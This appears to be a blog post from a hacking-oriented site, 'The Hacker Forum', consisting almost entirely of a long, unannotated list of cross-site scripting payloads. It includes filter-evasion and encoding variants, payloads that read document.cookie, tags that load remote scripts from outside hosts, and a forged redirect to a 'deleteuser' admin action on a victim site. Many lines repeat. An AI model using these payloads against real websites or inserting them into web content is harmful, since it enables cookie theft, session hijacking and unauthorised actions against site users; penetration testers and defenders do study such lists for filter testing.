THE LARGEST XSS LIST 1

Sumeet

Jul 18, 20198 min read

Updated: Jul 26, 2019

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";

"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>

"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>

"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>

"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF

"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>

"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>

><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr

g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250

"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>

"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt >alert(1) {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

"><h1/onmouseover='\u0061lert(1)'>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<%

<input value=<><iframe/src=javascript:confirm(1)

http://www.<script>alert(1)</script .com

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

\x3Cscript>javascript:alert(1)</script>

'"`><script>/* *\x2Fjavascript:alert(1)// */</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->

-->

-->

-->

`"'><img src='#\x27 onerror=javascript:alert(1)>

"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>

"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF

"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF

ABC<div style="x:expression\x5C(javascript:alert(1)">DEF

ABC<div style="x:expression\x00(javascript:alert(1)">DEF

ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF

ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF

ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x09expression(javascript:alert(1)">DEF

ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF

ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF

ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF

ABC<div style="x:\x20expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF

ABC<div style="x:\x00expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF

ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF

<video poster=javascript:javascript:alert(1)//

<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

<form><button formaction="javascript:javascript:alert(1)">X

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<img src=x onerror=javascript:alert(1)//">

<![><img src="]><img src=x onerror=javascript:alert(1)//">

<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>

<b <script>alert(1)</script>0

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

</ foo="><script>javascript:alert(1)</script>">

<? foo="><x foo='?><script>javascript:alert(1)</script>'>">

<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">

<% foo><x foo="%><script>javascript:alert(1)</script>">

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<img\x47src=x onerror="javascript:alert(1)">

<img\x10src=x onerror="javascript:alert(1)">

<img\x13src=x onerror="javascript:alert(1)">

<img\x32src=x onerror="javascript:alert(1)">

<img\x47src=x onerror="javascript:alert(1)">

<img\x11src=x onerror="javascript:alert(1)">

<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">

<img src="x` `<script>javascript:alert(1)</script>"` `>

<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X

<div style="font-family:'foo
;color:red;';">XXX

<div style="font-family:foo}color=red;">XXX

<// style=x:expression\28javascript:alert(1)\29>

<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X

<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X

<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >

1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

<event-source src="%(event)s" onload="javascript:alert(1)">

<<SCRIPT>%(payload)s//<</SCRIPT>

<IMG SRC="javascript:javascript:alert(1)"

<STYLE>@import'%(css)s';</STYLE>

<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">

<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS

<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>

<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javascript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X

<STYLE>@import'%(css)s';</STYLE>

<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>

<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG SRC="javascript:alert('XSS')"

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

¼script¾alert(¢XSS¢)¼/script¾

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt >alert(1) {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

"><h1/onmouseover='\u0061lert(1)'>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<%

<input value=<><iframe/src=javascript:confirm(1)

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

<marquee><script>alert('XSS')</script></marquee>

"><script>alert(0)</script>

</title><script>alert(/xss/)</script>

</textarea><script>alert(/xss/)</script>

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/></a></><img src=1.gif onerror=alert(1)>

window.alert("Bonjour !");

<div style="x:expression((window.r==1)?'':eval('r=1;

alert(String.fromCharCode(88,83,83));'))">

"><script alert(String.fromCharCode(88,83,83))</script>

'>><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'">><marquee><h1>XSS</h1></marquee>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

" onfocus=alert(document.domain) "> <"

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[color=red width=expression(alert(123))][color]

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

"></iframe><script>alert(123)</script>

'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X \nS \nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write("XSS");</SCRIPT>

a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

='><script>alert("xss")</script>

<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>

">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>

">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>

src="http://www.site.com/XSS.js"></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" /><script>alert('xss');</script>

"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='

"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="

\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'

http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??

http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??

'); alert('xss'); var x='

\\'); alert(\'xss\');var x=\'

//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

</body>

</html>

<SCRIPT> alert(“XSS”); </SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<SCRIPT>alert('XSS')</SCRIPT>

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

exp/*<XSS STYLE='no\xss:noxss("*//*");

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML>

<!--[if gte IE 4]>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<? echo('<SCR)';

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out

perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out

<SCRIPT SRC=http://ha.ckers.org/xss.js

<IMG SRC="javascript:alert('XSS')"

<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<SCRIPT>a=/XSS/

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>document.vulnerable=true;//<</SCRIPT>

<img SRC="javascript:document.vulnerable=true;"

\";document.vulnerable=true;;//

</title><SCRIPT>document.vulnerable=true;</script>

1script3document.vulnerable=true;1/script3

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>

<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&<script>document.vulnerable=true;</script>

&{document.vulnerable=true;};

<a href="about:<script>document.vulnerable=true;</script>">

<<script>document.vulnerable=true;</script>

THF

THE HACKER FORUM

THE LARGEST XSS LIST 1

Recent Posts

Comments